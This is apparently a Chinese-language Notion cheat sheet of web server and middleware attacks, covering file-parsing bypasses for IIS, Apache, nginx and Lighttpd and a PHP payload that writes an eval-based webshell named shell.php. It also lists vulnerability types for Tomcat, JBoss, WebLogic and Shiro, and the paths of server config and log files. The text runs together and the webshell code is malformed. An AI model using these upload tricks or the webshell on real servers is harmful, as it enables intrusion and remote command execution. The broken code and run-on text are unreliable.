<aside> 💡 Notion Tip: 服务器/中间件安全.
</aside>
IIS、Apache、nginx、Lighttpd、Tomcat/xx.asp/xx.jpg,"xx.asp"是文件夹名xx.asp;.jsp,默认Fast-CGI开启,直接在url中图片地址后输入/1.php,会把正常图片当成php解析sp.jpg,内容:<?PHP fputs(fopen('shell.php'),'w'),'<?php eval()$_POST[cmd]?>');'?>sp.jpg/.php,就会生成shell.php版本≤0.8.37,利用方法和IIS 7.0/7.5一样,Fast-CGI关闭也可以利用xxx.jpg%00.phptest.php.x1.x2.x3,Apache是从右往左判断后缀IIS:PUT漏洞、短文件名猜解、远程代码执行、解析漏洞
Apache:解析漏洞、目录遍历
Nginx:文件解析、目录遍历、CRLF注入、目录穿越
Tomcat:远程代码执行、war后门文件部署
JBoss:反序列化漏洞、war后门文件部署
WebLogic:反序列化漏洞、SSRF任意文件上传、war后门文件部署
ApacheShiro反序列化漏洞:ShirorememberMe(Shiro-550)、ShiroPaddingOracleAttack(Shiro-721)
/etc/httpd/conf//etc/nginxC:\\WINNT\\system32\\inetsrv\\MetaBase.binC:\\WINDOWS\\system32\\inetsrv\\MetaBase.xmlC:\\WINDOWS\\system32\\inetstr\\config\\applicationHost.config/var/log/apache2/access.log/var/log/apache2/error.log/var/log/nginx/access.log/var/log/nginx/error.log%windir%\\System32\\LogFiles%SystemDrive%\\inetpub\\logs\\LogFiles